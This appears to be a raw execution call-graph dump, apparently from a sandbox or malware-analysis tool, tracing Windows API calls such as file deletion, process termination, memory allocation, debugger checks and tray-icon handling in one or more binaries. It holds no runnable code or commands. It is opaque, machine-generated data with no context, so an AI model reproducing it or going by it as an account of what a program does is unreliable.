API calls 115503 bc970e 115499->115503 115502 be0fe6 Mailbox 59 API calls 115500->115502 115501 c022a0 115527 c2a48d 89 API calls 4 library calls 115501->115527 115502->115506 115503->115512 115515 bccca0 115503->115515 115505->115407 115506->115499 115506->115503 115506->115512 115509 c02278 115526 c2a48d 89 API calls 4 library calls 115509->115526 115511 c02253 115525 c2a48d 89 API calls 4 library calls 115511->115525 115512->115490 115512->115501 115512->115505 115512->115509 115512->115511 115524 bc8180 272 API calls 115512->115524 115514->115409 115516 bcccda 115515->115516 115519 bccd02 115515->115519 115517 bc9c80 272 API calls 115516->115517 115518 bccce0 115516->115518 115517->115518 115518->115512 115519->115518 115520 c04971 115519->115520 115521 bc53b0 272 API calls 115519->115521 115520->115518 115530 c2a48d 89 API calls 4 library calls 115520->115530 115521->115520 115523->115489 115524->115512 115525->115505 115526->115505 115527->115505 115528->115485 115529->115487 115530->115518 115532 bd1bef _memmove 115531->115532 115533 bd1bdc 115531->115533 115532->115440 115533->115532 115534 be0fe6 Mailbox 59 API calls 115533->115534 115534->115532 115535->115440 115536->115440 115537->115440 115538->115440 115539->115440 115540->115433 115541->115440 115542->115440 115544 bc4d37 84 API calls 115543->115544 115545 c3d203 115544->115545 115547 c3d24a Mailbox 115545->115547 115579 c3de8e 115545->115579 115547->115443 115548 c3d617 115613 c3dfb1 92 API calls Mailbox 115548->115613 115549 c3d4b0 115592 c3d057 115549->115592 115552 c3d626 115552->115549 115554 c3d632 115552->115554 115553 bc4d37 84 API calls 115567 c3d29b Mailbox 115553->115567 115554->115547 115559 c3d4e9 115560 c3d503 115559->115560 115561 c3d51c 115559->115561 115609 c2a48d 89 API calls 4 library calls 115560->115609 115563 bc47be 59 API calls 115561->115563 115566 c3d528 115563->115566 115564 c3d50e GetCurrentProcess TerminateProcess 115564->115561 115565 c3d4a2 115565->115548 115565->115549 115568 bc4540 59 API calls 115566->115568 115567->115547 115567->115553 115567->115565 115607 c2fc0d 59 API calls 2 library calls 115567->115607 115608 c3d6c8 61 API calls 2 library calls 115567->115608 115569 c3d53e 115568->115569 115577 c3d565 115569->115577 115610 bc4230 59 API calls Mailbox 115569->115610 115571 c3d68d 115571->115547 115575 c3d6a1 FreeLibrary 115571->115575 115572 c3d554 115611 c3dd32 107 API calls _free 115572->115611 115575->115547 115577->115571 115578 bc523c 59 API calls 115577->115578 115612 bc4230 59 API calls Mailbox 115577->115612 115614 c3dd32 107 API calls _free 115577->115614 115578->115577 115580 bd1aa4 59 API calls 115579->115580 115581 c3dea9 CharLowerBuffW 115580->115581 115615 c1f903 115581->115615 115585 bd1207 59 API calls 115586 c3dee2 115585->115586 115587 bd1462 59 API calls 115586->115587 115588 c3def9 115587->115588 115590 bd1981 59 API calls 115588->115590 115589 c3df41 Mailbox 115589->115567 115591 c3df05 Mailbox 115590->115591 115591->115589 115622 c3d6c8 61 API calls 2 library calls 115591->115622 115593 c3d072 115592->115593 115597 c3d0c7 115592->115597 115594 be0fe6 Mailbox 59 API calls 115593->115594 115595 c3d094 115594->115595 115596 be0fe6 Mailbox 59 API calls 115595->115596 115595->115597 115596->115595 115598 c3e139 115597->115598 115599 c3e362 Mailbox 115598->115599 115603 c3e15c _strcat _wcscpy __NMSG_WRITE 115598->115603 115599->115559 115600 bc5087 59 API calls 115600->115603 115601 bc50d5 59 API calls 115601->115603 115602 bc502b 59 API calls 115602->115603 115603->115599 115603->115600 115603->115601 115603->115602 115604 be593c 58 API calls __crtLCMapStringA_stat 115603->115604 115605 bc4d37 84 API calls 115603->115605 115625 c25e42 61 API calls 2 library calls 115603->115625 115604->115603 115605->115603 115607->115567 115608->115567 115609->115564 115610->115572 115611->115577 115612->115577 115613->115552 115614->115577 115616 c1f92e __NMSG_WRITE 115615->115616 115617 c1fa14 115616->115617 115618 c1f963 115616->115618 115621 c1f96d 115616->115621 115617->115621 115624 bd14db 61 API calls 115617->115624 115618->115621 115623 bd14db 61 API calls 115618->115623 115621->115585 115621->115591 115622->115589 115623->115618 115624->115617 115625->115603 115627 bd1207 59 API calls 115626->115627 115628 c24024 115627->115628 115629 bd1207 59 API calls 115628->115629 115630 c2402d 115629->115630 115631 bd1207 59 API calls 115630->115631 115632 c24036 115631->115632 115633 be0284 60 API calls 115632->115633 115634 c24041 115633->115634 115650 c24fec GetFileAttributesW 115634->115650 115637 c2405c 115639 be0119 59 API calls 115637->115639 115638 bd1900 59 API calls 115638->115637 115640 c24070 FindFirstFileW 115639->115640 115641 c240fc FindClose 115640->115641 115644 c2408f 115640->115644 115646 c24107 Mailbox 115641->115646 115642 c240d7 FindNextFileW 115642->115644 115643 bd1c9c 59 API calls 115643->115644 115644->115641 115644->115642 115644->115643 115645 bd17e0 59 API calls 115644->115645 115647 bd1900 59 API calls 115644->115647 115645->115644 115646->115448 115648 c240c8 DeleteFileW 115647->115648 115648->115642 115649 c240f3 FindClose 115648->115649 115649->115646 115651 c2404a 115650->115651 115651->115637 115651->115638 115687 c26735 115652->115687 115655 c268b1 115658 c26921 115655->115658 115661 c26917 115655->115661 115666 c268ca 115655->115666 115656 c26899 115703 c26a73 89 API calls 2 library calls 115656->115703 115659 c26951 115658->115659 115660 c2699f 115658->115660 115677 c2683d _memmove 115658->115677 115664 c26971 115659->115664 115665 c26956 115659->115665 115662 c269a6 115660->115662 115663 c26a3a 115660->115663 115661->115658 115684 c268fe 115661->115684 115667 c269a9 115662->115667 115668 c26a1c 115662->115668 115663->115677 115712 bc50d5 59 API calls 115663->115712 115664->115677 115708 bc5087 59 API calls 115664->115708 115665->115677 115707 bc5087 59 API calls 115665->115707 115704 c28cd0 61 API calls 115666->115704 115672 c269e5 115667->115672 115673 c269ad 115667->115673 115668->115677 115711 bc50d5 59 API calls 115668->115711 115672->115677 115710 bc50d5 59 API calls 115672->115710 115673->115677 115709 bc50d5 59 API calls 115673->115709 115677->115458 115680 c268d2 115705 c28cd0 61 API calls 115680->115705 115682 c268e9 _memmove 115706 c28cd0 61 API calls 115682->115706 115694 c27c7f 115684->115694 115685->115452 115686->115456 115688 c26785 115687->115688 115692 c26746 115687->115692 115723 bc502b 59 API calls 115688->115723 115690 bc4d37 84 API calls 115690->115692 115692->115690 115693 c26783 115692->115693 115713 be312d 115692->115713 115693->115655 115693->115656 115693->115677 115695 c27c8a 115694->115695 115696 be0fe6 Mailbox 59 API calls 115695->115696 115697 c27c91 115696->115697 115698 c27cbe 115697->115698 115699 c27c9d 115697->115699 115701 be0fe6 Mailbox 59 API calls 115698->115701 115700 be0fe6 Mailbox 59 API calls 115699->115700 115702 c27ca6 _memset 115700->115702 115701->115702 115702->115677 115703->115677 115704->115680 115705->115682 115706->115684 115707->115677 115708->115677 115709->115677 115710->115677 115711->115677 115712->115677 115714 be31ae 115713->115714 115715 be3139 115713->115715 115726 be31c0 60 API calls 4 library calls 115714->115726 115721 be315e 115715->115721 115724 be8d58 58 API calls __getptd_noexit 115715->115724 115718 be31bb 115718->115692 115719 be3145 115725 be8fe6 9 API calls __write 115719->115725 115721->115692 115722 be3150 115722->115692 115723->115693 115724->115719 115725->115722 115726->115718 115728 bc3b3f 115727->115728 115729 bc3b67 115727->115729 115730 bc3b4d 115728->115730 115731 bc3b31 59 API calls 115728->115731 115729->115355 115732 bc3b53 115730->115732 115733 bc3b31 59 API calls 115730->115733 115731->115730 115732->115729 115737 bc5190 59 API calls Mailbox 115732->115737 115733->115732 115735->115358 115736->115350 115737->115729 115739 bc3e11 115738->115739 115740 bc3c43 115738->115740 115739->115372 115741 bd1207 59 API calls 115740->115741 115744 bc3c54 115740->115744 115742 bc3e73 115741->115742 115743 be2f70 __cinit 67 API calls 115742->115743 115743->115744 115744->115372 115745->115379 115746->114973 115747->114970 115748->114730 115749->114732 115750->114728 115751->114732 115752->114725 115753->114747 115754->114757 115755->114760 115756->114757 115757->114757 115759 c27cf1 115758->115759 115760 be0fe6 Mailbox 59 API calls 115759->115760 115761 c27cf8 115760->115761 115764 c26135 115761->115764 115763 c27d3b Mailbox 115763->114766 115765 bd1aa4 59 API calls 115764->115765 115766 c26148 CharLowerBuffW 115765->115766 115768 c2615b 115766->115768 115767 c26195 115769 c261a7 115767->115769 115771 bd1609 59 API calls 115767->115771 115768->115767 115770 bd1609 59 API calls 115768->115770 115781 c26165 _memset Mailbox 115768->115781 115772 be0fe6 Mailbox 59 API calls 115769->115772 115770->115768 115771->115769 115776 c261d5 115772->115776 115775 c26233 115778 be0fe6 Mailbox 59 API calls 115775->115778 115775->115781 115777 c261f4 115776->115777 115797 c26071 59 API calls 115776->115797 115782 c26292 115777->115782 115779 c2624d 115778->115779 115780 be0fe6 Mailbox 59 API calls 115779->115780 115780->115781 115781->115763 115783 bd1207 59 API calls 115782->115783 115784 c262c4 115783->115784 115785 bd1207 59 API calls 115784->115785 115786 c262cd 115785->115786 115787 bd1207 59 API calls 115786->115787 115793 c262d6 _wcscmp 115787->115793 115788 be3836 GetStringTypeW 115788->115793 115789 bd1821 59 API calls 115789->115793 115791 be37ba 59 API calls 115791->115793 115792 c26292 60 API calls 115792->115793 115793->115788 115793->115789 115793->115791 115793->115792 115794 bd153b 59 API calls 115793->115794 115795 c265ab Mailbox 115793->115795 115796 bd1c9c 59 API calls 115793->115796 115798 be385c GetStringTypeW _iswctype 115793->115798 115794->115793 115795->115775 115796->115793 115797->115776 115798->115793 115800 c26818 92 API calls 115799->115800 115801 c26813 115800->115801 115801->114774 115802->114768 115803->114772 115805 be0fe6 Mailbox 59 API calls 115804->115805 115806 bc5285 115805->115806 115807 bc5294 115806->115807 115808 bd1a36 59 API calls 115806->115808 115807->114779 115808->115807 115810 bd59fe _memset 115809->115810 115827 bd5800 115810->115827 115813 bd5a83 115815 bd5a9d Shell_NotifyIconW 115813->115815 115816 bd5ab9 Shell_NotifyIconW 115813->115816 115817 bd5aab 115815->115817 115816->115817 115831 bd56f8 115817->115831 115819 bd5ab2 115819->114785 115821 bd5b25 115820->115821 115822 bd5ad5 _memset 115820->115822 115821->114785 115823 bd5af4 Shell_NotifyIconW 115822->115823 115823->115821 115824->114785 115825->114785 115826->114785 115828 bd581c 115827->115828 115829 bd5810 115827->115829 115828->115829 115830 bd5821 DestroyIcon 115828->115830 115829->115813 115861 c234dd 62 API calls _W_store_winword 115829->115861 115830->115829 115832 bd57fa Mailbox 115831->115832 115833 bd5715 115831->115833 115832->115819 115834 bd162d 59 API calls 115833->115834 115835 bd5723 115834->115835 115836 c10c4c LoadStringW 115835->115836 115837 bd5730 115835->115837 115840 c10c66 115836->115840 115838 bd1821 59 API calls 115837->115838 115839 bd5745 115838->115839 115841 bd5752 115839->115841 115848 c10c74 115839->115848 115842 bd1c9c 59 API calls 115840->115842 115841->115840 115843 bd5760 115841->115843 115849 bd5778 _memset _wcscpy 115842->115849 115844 bd1900 59 API calls 115843->115844 115845 bd576a 115844->115845 115846 bd17e0 59 API calls 115845->115846 115846->115849 115847 c10cb7 Mailbox 115863 be38c8 83 API calls 4 library calls 115847->115863 115848->115847 115848->115849 115850 bd1207 59 API calls 115848->115850 115851 bd57e0 Shell_NotifyIconW 115849->115851 115852 c10c9e 115850->115852 115851->115832 115862 c20252 60 API calls Mailbox 115852->115862 115855 c10ca9 115857 bd17e0 59 API calls 115855->115857 115856 c10cd6 115858 bd1900 59 API calls 115856->115858 115857->115847 115859 c10ce7 115858->115859 115860 bd1900 59 API calls 115859->115860 115860->115849 115861->115813 115862->115855 115863->115856 115865 be0fe6 Mailbox 59 API calls 115864->115865 115866 bd40e0 115865->115866 115867 bd1c7e 59 API calls 115866->115867 115868 bd40ed 115867->115868 115868->114806 115870 bd404e 115869->115870 115871 bd4085 115869->115871 115872 be0fe6 Mailbox 59 API calls 115870->115872 115880 bd3f20 59 API calls Mailbox 115871->115880 115874 bd4055 WideCharToMultiByte 115872->115874 115879 bd3f79 59 API calls 2 library calls 115874->115879 115876 bd4077 115876->114810 115877->114803 115878->114807 115879->115876 115880->115876 115881->114830 115882->114839 115883->114844 115884->114856 115885->114860 115886 c292c8 115887 c292d5 115886->115887 115892 c292db 115886->115892 115888 be2f85 _free 58 API calls 115887->115888 115888->115892 115889 be2f85 _free 58 API calls 115890 c292ec 115889->115890 115891 c292fe 115890->115891 115893 be2f85 _free 58 API calls 115890->115893 115892->115889 115892->115890 115893->115891 115894 bc1016 115899 bd5ce7 115894->115899 115897 be2f70 __cinit 67 API calls 115898 bc1025 115897->115898 115900 be0fe6 Mailbox 59 API calls 115899->115900 115901 bd5cef 115900->115901 115902 bc101b 115901->115902 115906 bd5f39 115901->115906 115902->115897 115907 bd5cfb 115906->115907 115908 bd5f42 115906->115908 115910 bd5d13 115907->115910 115909 be2f70 __cinit 67 API calls 115908->115909 115909->115907 115911 bd1207 59 API calls 115910->115911 115912 bd5d2b GetVersionExW 115911->115912 115913 bd1821 59 API calls 115912->115913 115914 bd5d6e 115913->115914 115915 bd1981 59 API calls 115914->115915 115926 bd5d9b 115914->115926 115916 bd5d8f 115915->115916 115917 bd133d 59 API calls 115916->115917 115917->115926 115918 bd5e00 GetCurrentProcess IsWow64Process 115919 bd5e19 115918->115919 115921 bd5e2f 115919->115921 115922 bd5e98 GetSystemInfo 115919->115922 115920 c11098 115932 bd55f0 115921->115932 115924 bd5e65 115922->115924 115924->115902 115926->115918 115926->115920 115927 bd5e8c GetSystemInfo 115929 bd5e49 115927->115929 115928 bd5e41 115930 bd55f0 2 API calls 115928->115930 115929->115924 115931 bd5e5c FreeLibrary 115929->115931 115930->115929 115931->115924 115933 bd5619 115932->115933 115934 bd55f9 LoadLibraryA 115932->115934 115933->115927 115933->115928 115934->115933 115935 bd560a GetProcAddress 115934->115935 115935->115933 115936 6cc5b8ae 115937 6cc5b8ba 115936->115937 115938 6cc5b8e3 dllmain_raw 115937->115938 115939 6cc5b8de 115937->115939 115948 6cc5b8c9 115937->115948 115940 6cc5b8fd dllmain_crt_dispatch 115938->115940 115938->115948 115949 6cc3bed0 DisableThreadLibraryCalls LoadLibraryExW 115939->115949 115940->115939 115940->115948 115942 6cc5b91e 115943 6cc5b94a 115942->115943 115950 6cc3bed0 DisableThreadLibraryCalls LoadLibraryExW 115942->115950 115944 6cc5b953 dllmain_crt_dispatch 115943->115944 115943->115948 115946 6cc5b966 dllmain_raw 115944->115946 115944->115948 115946->115948 115947 6cc5b936 dllmain_crt_dispatch dllmain_raw 115947->115943 115949->115942 115950->115947 115951 bc7357 115952 bc7360 115951->115952 115953 bc78f5 115951->115953 115952->115953 115954 bc4d37 84 API calls 115952->115954 115955 bc6fdb Mailbox 115953->115955 115962 c187f9 59 API calls _memmove 115953->115962 115956 bc738b 115954->115956 115956->115953 115958 bc739b 115956->115958 115960 bd1680 59 API calls 115958->115960 115959 bff91b 115961 bd1c9c 59 API calls 115959->115961 115960->115955 115961->115955 115962->115959 115963 bc9a6c 115966 bc829c 115963->115966 115965 bc9a78 115967 bc82b4 115966->115967 115974 bc8308 115966->115974 115968 bc53b0 272 API calls 115967->115968 115967->115974 115972 bc82eb 115968->115972 115970 c00ed8 115970->115970 115971 bc8331 115971->115965 115972->115971 115973 bc523c 59 API calls 115972->115973 115973->115974 115974->115971 115975 c2a48d 89 API calls 4 library calls 115974->115975 115975->115970 115976 6cc5b694 115977 6cc5b6a0 115976->115977 115998 6cc5af2a 115977->115998 115979 6cc5b6a7 115980 6cc5b796 ___scrt_fastfail 115979->115980 115981 6cc5b6d1 __RTC_Initialize 115979->115981 115982 6cc5b6ac ___scrt_is_nonwritable_in_current_image 115979->115982 115983 6cc5b79e 115980->115983 115981->115982 116002 6cc5bf89 InitializeSListHead 115981->116002 115985 6cc5b7d2 115983->115985 115986 6cc5b828 ___scrt_fastfail 115983->115986 115997 6cc5b7b3 ___scrt_uninitialize_crt __RTC_Initialize 115983->115997 116003 6cc5bf95 __std_type_info_destroy_list 115985->116003 115988 6cc5b830 115986->115988 115987 6cc5b6ee ___scrt_initialize_default_local_stdio_options 115991 6cc5b6f3 _initterm_e 115987->115991 115989 6cc5b86e dllmain_crt_process_detach 115988->115989 115990 6cc5b83b 115988->115990 115996 6cc5b840 115989->115996 115992 6cc5b860 dllmain_crt_process_attach 115990->115992 115990->115996 115991->115982 115994 6cc5b708 115991->115994 115992->115996 115994->115982 115995 6cc5b711 _initterm 115994->115995 115995->115982 115999 6cc5af33 115998->115999 116000 6cc5af3a ___isa_available_init 115998->116000 115999->116000 116001 6cc5af44 116000->116001 116001->115979 116002->115987 116003->115997 116004 6cc3c930 GetSystemInfo VirtualAlloc 116005 6cc3c9a3 GetSystemInfo 116004->116005 116006 6cc3c973 116004->116006 116007 6cc3c9d0 116005->116007 116008 6cc3c9b6 116005->116008 116007->116006 116010 6cc3c9d8 VirtualAlloc 116007->116010 116008->116007 116009 6cc3c9bd 116008->116009 116009->116006 116011 6cc3c9c1 VirtualFree 116009->116011 116012 6cc3c9ec 116010->116012 116011->116006 116012->116006 116013 bc9a88 116016 bc86e0 116013->116016 116017 bc86fd 116016->116017 116018 c00ff8 116017->116018 116019 c00fad 116017->116019 116034 bc8724 116017->116034 116051 c3aad0 272 API calls __cinit 116018->116051 116022 c00fb5 116019->116022 116026 c00fc2 116019->116026 116019->116034 116021 bc5278 59 API calls 116021->116034 116049 c3b0e4 272 API calls 116022->116049 116023 be2f70 __cinit 67 API calls 116023->116034 116030 bc898d 116026->116030 116050 c3b58c 272 API calls 3 library calls 116026->116050 116027 c01289 116027->116027 116028 bc3c30 68 API calls 116028->116034 116035 bc8a17 116030->116035 116054 c2a48d 89 API calls 4 library calls 116030->116054 116031 c011af 116053 c3ae3b 89 API calls 116031->116053 116034->116021 116034->116023 116034->116028 116034->116030 116034->116031 116034->116035 116036 bc39be 68 API calls 116034->116036 116039 bc523c 59 API calls 116034->116039 116041 bc3f42 68 API calls 116034->116041 116042 bc53b0 272 API calls 116034->116042 116043 bd1c9c 59 API calls 116034->116043 116045 bc3938 68 API calls 116034->116045 116046 bc855e 272 API calls 116034->116046 116047 bc84e2 89 API calls 116034->116047 116048 bc835f 272 API calls 116034->116048 116052 c173ab 59 API calls 116034->116052 116036->116034 116039->116034 116041->116034 116042->116034 116043->116034 116045->116034 116046->116034 116047->116034 116048->116034 116049->116026 116050->116030 116051->116034 116052->116034 116053->116030 116054->116027 116055 6cc5b830 116056 6cc5b86e dllmain_crt_process_detach 116055->116056 116057 6cc5b83b 116055->116057 116059 6cc5b840 116056->116059 116058 6cc5b860 dllmain_crt_process_attach 116057->116058 116057->116059 116058->116059 116060 bc9b8b 116061 bc86e0 272 API calls 116060->116061 116062 bc9b99 116061->116062 116063 bc1066 116068 bcaaaa 116063->116068 116065 bc106c 116066 be2f70 __cinit 67 API calls 116065->116066 116067 bc1076 116066->116067 116069 bcaacb 116068->116069 116101 be02eb 116069->116101 116073 bcab12 116074 bd1207 59 API calls 116073->116074 116075 bcab1c 116074->116075 116076 bd1207 59 API calls 116075->116076 116077 bcab26 116076->116077 116078 bd1207 59 API calls 116077->116078 116079 bcab30 116078->116079 116080 bd1207 59 API calls 116079->116080 116081 bcab6e 116080->116081 116082 bd1207 59 API calls 116081->116082 116083 bcac39 116082->116083 116111 be0588 116083->116111 116087 bcac6b 116088 bd1207 59 API calls 116087->116088 116089 bcac75 116088->116089 116139 bdfe2b 116089->116139 116091 bcacbc 116092 bcaccc GetStdHandle 116091->116092 116093 bcad18 116092->116093 116094 c02f39 116092->116094 116095 bcad20 OleInitialize 116093->116095 116094->116093 116096 c02f42 116094->116096 116095->116065 116146 c270f3 64 API calls Mailbox 116096->116146 116098 c02f49 116147 c277c2 CreateThread 116098->116147 116100 c02f55 CloseHandle 116100->116095 116148 be03c4 116101->116148 116104 be03c4 59 API calls 116105 be032d 116104->116105 116106 bd1207 59 API calls 116105->116106 116107 be0339 116106->116107 116108 bd1821 59 API calls 116107->116108 116109 bcaad1 116108->116109 116110 be07bb 6 API calls 116109->116110 116110->116073 116112 bd1207 59 API calls 116111->116112 116113 be0598 116112->116113 116114 bd1207 59 API calls 116113->116114 116115 be05a0 116114->116115 116155 bd10c3 116115->116155 116118 bd10c3 59 API calls 116119 be05b0 116118->116119 116120 bd1207 59 API calls 116119->116120 116121 be05bb 116120->116121 116122 be0fe6 Mailbox 59 API calls 116121->116122 116123 bcac43 116122->116123 116124 bdff4c 116123->116124 116125 bdff5a 116124->116125 116126 bd1207 59 API calls 116125->116126 116127 bdff65 116126->116127 116128 bd1207 59 API calls 116127->116128 116129 bdff70 116128->116129 116130 bd1207 59 API calls 116129->116130 116131 bdff7b 116130->116131 116132 bd1207 59 API calls 116131->116132 116133 bdff86 116132->116133 116134 bd10c3 59 API calls 116133->116134 116135 bdff91 116134->116135 116136 be0fe6 Mailbox 59 API calls 116135->116136 116137 bdff98 RegisterWindowMessageW 116136->116137 116137->116087 116140 bdfe3b 116139->116140 116141 c1620c 116139->116141 116143 be0fe6 Mailbox 59 API calls 116140->116143 116158 c2a12a 59 API calls 116141->116158 116145 bdfe43 116143->116145 116144 c16217 116145->116091 116146->116098 116147->116100 116159 c277a8 65 API calls 116147->116159 116149 bd1207 59 API calls 116148->116149 116150 be03cf 116149->116150 116151 bd1207 59 API calls 116150->116151 116152 be03d7 116151->116152 116153 bd1207 59 API calls 116152->116153 116154 be0323 116153->116154 116154->116104 116156 bd1207 59 API calls 116155->116156 116157 bd10cb 116156->116157 116157->116118 116158->116144 116160 bfe463 116172 bc373a 116160->116172 116162 bfe479 116163 bfe48f 116162->116163 116164 bfe4fa 116162->116164 116181 bc5376 60 API calls 116163->116181 116166 bcb020 272 API calls 116164->116166 116171 bfe4ee Mailbox 116166->116171 116168 bfe4ce 116168->116171 116182 c2890a 59 API calls Mailbox 116168->116182 116169 bff046 Mailbox 116171->116169 116183 c2a48d 89 API calls 4 library calls 116171->116183 116173 bc3758 116172->116173 116174 bc3746 116172->116174 116176 bc375e 116173->116176 116177 bc3787 116173->116177 116175 bc523c 59 API calls 116174->116175 116180 bc3750 116175->116180 116178 be0fe6 Mailbox 59 API calls 116176->116178 116179 bc523c 59 API calls 116177->116179 116178->116180 116179->116180 116180->116162 116181->116168 116182->116171 116183->116169 116184 be7e83 116185 be7e8f __setmbcp 116184->116185 116221 bea038 GetStartupInfoW 116185->116221 116187 be7e94 116223 be8dac GetProcessHeap 116187->116223 116189 be7eec 116190 be7ef7 116189->116190 116306 be7fd3 58 API calls 3 library calls 116189->116306 116224 be9d16 116190->116224 116193 be7efd 116194 be7f08 __RTC_Initialize 116193->116194 116307 be7fd3 58 API calls 3 library calls 116193->116307 116245 bed802 116194->116245 116197 be7f17 116198 be7f23 GetCommandLineW 116197->116198 116308 be7fd3 58 API calls 3 library calls 116197->116308 116264 bf5153 GetEnvironmentStringsW 116198->116264 116201 be7f22 116201->116198 116204 be7f3d 116205 be7f48 116204->116205 116309 be32e5 58 API calls 3 library calls 116204->116309 116274 bf4f88 116205->116274 116208 be7f4e 116209 be7f59 116208->116209 116310 be32e5 58 API calls 3 library calls 116208->116310 116288 be331f 116209->116288 116212 be7f61 116213 be7f6c __wwincmdln 116212->116213 116311 be32e5 58 API calls 3 library calls 116212->116311 116294 bd5f8b 116213->116294 116216 be7f80 116217 be7f8f 116216->116217 116312 be3588 58 API calls _doexit 116216->116312 116313 be3310 58 API calls _doexit 116217->116313 116220 be7f94 __setmbcp 116222 bea04e 116221->116222 116222->116187 116223->116189 116314 be33b7 36 API calls 2 library calls 116224->116314 116226 be9d1b 116315 be9f6c InitializeCriticalSectionAndSpinCount ___lock_fhandle 116226->116315 116228 be9d20 116229 be9d24 116228->116229 116317 be9fba TlsAlloc 116228->116317 116316 be9d8c 61 API calls 2 library calls 116229->116316 116232 be9d29 116232->116193 116233 be9d36 116233->116229 116234 be9d41 116233->116234 116318 be8a05 116234->116318 116237 be9d83 116326 be9d8c 61 API calls 2 library calls 116237->116326 116240 be9d62 116240->116237 116242 be9d68 116240->116242 116241 be9d88 116241->116193 116325 be9c63 58 API calls 4 library calls 116242->116325 116244 be9d70 GetCurrentThreadId 116244->116193 116246 bed80e __setmbcp 116245->116246 116247 be9e3b __lock 58 API calls 116246->116247 116248 bed815 116247->116248 116249 be8a05 __calloc_crt 58 API calls 116248->116249 116250 bed826 116249->116250 116251 bed891 GetStartupInfoW 116250->116251 116252 bed831 @_EH4_CallFilterFunc@8 __setmbcp 116250->116252 116258 bed8a6 116251->116258 116261 bed9d5 116251->116261 116252->116197 116253 beda9d 116340 bedaad LeaveCriticalSection _doexit 116253->116340 116255 be8a05 __calloc_crt 58 API calls 116255->116258 116256 beda22 GetStdHandle 116256->116261 116257 beda35 GetFileType 116257->116261 116258->116255 116260 bed8f4 116258->116260 116258->116261 116259 bed928 GetFileType 116259->116260 116260->116259 116260->116261 116338 bea05b InitializeCriticalSectionAndSpinCount 116260->116338 116261->116253 116261->116256 116261->116257 116339 bea05b InitializeCriticalSectionAndSpinCount 116261->116339 116265 be7f33 116264->116265 116266 bf5164 116264->116266 116270 bf4d4b GetModuleFileNameW 116265->116270 116341 be8a4d 58 API calls 2 library calls 116266->116341 116268 bf518a _memmove 116269 bf51a0 FreeEnvironmentStringsW 116268->116269 116269->116265 116271 bf4d7f _wparse_cmdline 116270->116271 116273 bf4dbf _wparse_cmdline 116271->116273 116342 be8a4d 58 API calls 2 library calls 116271->116342 116273->116204 116275 bf4fa1 __NMSG_WRITE 116274->116275 116279 bf4f99 116274->116279 116276 be8a05 __calloc_crt 58 API calls 116275->116276 116284 bf4fca __NMSG_WRITE 116276->116284 116277 bf5021 116278 be2f85 _free 58 API calls 116277->116278 116278->116279 116279->116208 116280 be8a05 __calloc_crt 58 API calls 116280->116284 116281 bf5046 116283 be2f85 _free 58 API calls 116281->116283 116283->116279 116284->116277 116284->116279 116284->116280 116284->116281 116285 bf505d 116284->116285 116343 bf4837 58 API calls 2 library calls 116284->116343 116344 be8ff6 IsProcessorFeaturePresent 116285->116344 116287 bf5069 116287->116208 116290 be332b __IsNonwritableInCurrentImage 116288->116290 116367 bea701 116290->116367 116291 be3349 __initterm_e 116292 be2f70 __cinit 67 API calls 116291->116292 116293 be3368 __cinit __IsNonwritableInCurrentImage 116291->116293 116292->116293 116293->116212 116295 bd5fa5 116294->116295 116305 bd6044 116294->116305 116296 bd5fdf IsThemeActive 116295->116296 116370 be359c 116296->116370 116300 bd600b 116382 bd5f00 SystemParametersInfoW SystemParametersInfoW 116300->116382 116302 bd6017 116383 bd5240 116302->116383 116304 bd601f SystemParametersInfoW 116304->116305 116305->116216 116306->116190 116307->116194 116308->116201 116312->116217 116313->116220 116314->116226 116315->116228 116316->116232 116317->116233 116319 be8a0c 116318->116319 116321 be8a47 116319->116321 116323 be8a2a 116319->116323 116327 bf5426 116319->116327 116321->116237 116324 bea016 TlsSetValue 116321->116324 116323->116319 116323->116321 116335 bea362 Sleep 116323->116335 116324->116240 116325->116244 116326->116241 116328 bf5431 116327->116328 116334 bf544c 116327->116334 116329 bf543d 116328->116329 116328->116334 116336 be8d58 58 API calls __getptd_noexit 116329->116336 116331 bf545c HeapAlloc 116333 bf5442 116331->116333 116331->116334 116333->116319 116334->116331 116334->116333 116337 be35d1 DecodePointer 116334->116337 116335->116323 116336->116333 116337->116334 116338->116260 116339->116261 116340->116252 116341->116268 116342->116273 116343->116284 116345 be9001 116344->116345 116350 be8e89 116345->116350 116349 be901c 116349->116287 116351 be8ea3 _memset ___raise_securityfailure 116350->116351 116352 be8ec3 IsDebuggerPresent 116351->116352 116358 bea385 SetUnhandledExceptionFilter UnhandledExceptionFilter 116352->116358 116354 be8f87 ___raise_securityfailure 116359 bec826 116354->116359 116356 be8faa 116357 bea370 GetCurrentProcess TerminateProcess 116356->116357 116357->116349 116358->116354 116360 bec82e 116359->116360 116361 bec830 IsProcessorFeaturePresent 116359->116361 116360->116356 116363 bf5b3a 116361->116363 116366 bf5ae9 5 API calls ___raise_securityfailure 116363->116366 116365 bf5c1d 116365->116356 116366->116365 116368 bea704 EncodePointer 116367->116368 116368->116368 116369 bea71e 116368->116369 116369->116291 116371 be9e3b __lock 58 API calls 116370->116371 116372 be35a7 DecodePointer EncodePointer 116371->116372 116435 be9fa5 LeaveCriticalSection 116372->116435 116374 bd6004 116375 be3604 116374->116375 116376 be3628 116375->116376 116377 be360e 116375->116377 116376->116300 116377->116376 116436 be8d58 58 API calls __getptd_noexit 116377->116436 116379 be3618 116437 be8fe6 9 API calls __write 116379->116437 116381 be3623 116381->116300 116382->116302 116384 bd524d __ftell_nolock 116383->116384 116385 bd1207 59 API calls 116384->116385 116386 bd5258 GetCurrentDirectoryW 116385->116386 116438 bd4ec8 116386->116438 116388 bd527e IsDebuggerPresent 116389 c10b21 MessageBoxA 116388->116389 116390 bd528c 116388->116390 116391 c10b39 116389->116391 116390->116391 116392 bd52a0 116390->116392 116546 bd314d 59 API calls Mailbox 116391->116546 116506 bd31bf 116392->116506 116396 c10b49 116402 c10b5f SetCurrentDirectoryW 116396->116402 116401 bd536c Mailbox 116401->116304 116402->116401 116435->116374 116436->116379 116437->116381 116439 bd1207 59 API calls 116438->116439 116440 bd4ede 116439->116440 116548 bd5420 116440->116548 116442 bd4efc 116443 bd19e1 59 API calls 116442->116443 116444 bd4f10 116443->116444 116445 bd1c9c 59 API calls 116444->116445 116446 bd4f1b 116445->116446 116447 bc477a 59 API calls 116446->116447 116448 bd4f27 116447->116448 116449 bd1a36 59 API calls 116448->116449 116450 bd4f34 116449->116450 116451 bc39be 68 API calls 116450->116451 116452 bd4f44 Mailbox 116451->116452 116453 bd1a36 59 API calls 116452->116453 116454 bd4f68 116453->116454 116455 bc39be 68 API calls 116454->116455 116456 bd4f77 Mailbox 116455->116456 116457 bd1207 59 API calls 116456->116457 116458 bd4f94 116457->116458 116562 bd55bc 